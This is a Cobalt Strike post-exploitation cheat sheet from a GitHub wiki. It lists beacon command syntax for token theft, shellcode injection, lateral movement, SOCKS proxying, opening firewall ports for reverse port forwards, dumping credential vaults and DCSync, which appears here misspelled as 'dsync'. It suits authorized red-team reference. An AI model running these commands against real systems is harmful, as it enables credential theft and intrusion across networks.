Cobalt Strike cheat sheet - CraigDonkin/Infrastructure GitHub Wiki

Command execution

execute via cmd.exe

shell <command>

execute a command without cmd.exe

run <command>

Execute a command via powershell

powershell-import <script>
powershell <powershell command>

Execute a local .NET executable as a post exploitation job.

execute-assembly <path to executable> <command line arguments>

Token impersonation

steal_token <pid>

When finished:

rev2self

make_token <username> <password>

Token store

Tokens cannot be transferred between beacons.

token-store steal <pid>
token-store show
token-store use <token id>
token-store remove <token id>
token-store remove-all

When finished:

rev2self

Process injection

Injects shellcode into a process. Need to be an elevated context to inject into processes owned by other users. If the process is closed the beacon is lost.

inject <pid> <process architecture x64> <listener name>

Lateral Movement

Jump command

jump <method> <target> <listener>

Methods:

psexec
psexec64
psexec_psh
winrm
winrm64

Remote-exec command

remote-exec <method> <target> <command>

Methods:

psexec
winrm
wmi

WMI can only be used once per security context per beacon. To use WMI from one beacon as two different users use the spawn commands to perform the WMI execution from a different process.

Session passing

To spawn a session for a listener use:

spawn <listener>

To spawn a sesssion for a specific user use:

spawn <domain\user> <password> <listener>

Socks proxy

  • Only SOCKS5 supports authentication
  • Might need to set sleep to 0 otherwise proxied tools will timeout, but this makes things noisier.
  • SOCKS4a:

socks <port>

  • SOCKS5:

socks <port> socks5 disableNoAuth <username> <password> enableLogging

  • Configure proxychains to use the teamserver IP and port specified

Reverse port forward

  • To create a reverse port forward to relay traffic between two hosts
  • To bind port 8080 on the compromised host to the team server
  • First create an allow rule through the firewall with powershell, you can also delete a rule you created.
powershell New-NetFirewallRule -DisplayName "<something>" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
powershell Remove-NetFirewallRule -DisplayName "<as above>"

rportfwd 8080 127.0.0.1 80
  • then target port 8080 on the compromised host from other servers to relay the traffic.
http://<compromised-IP>:8080

Jobs

To view jobs run jobs

To kill a job use jobkill <JID> or kill <PID>

Credential manager

  • To view a user's vaults:
run vaultcmd /list
run vaultcmd /listcreds:"<vault name>" /all

Perform DCSYNC

dsync <DC FQDN> <DOMAIN\USERNAME>
⚠️ **GitHub.com Fallback** ⚠️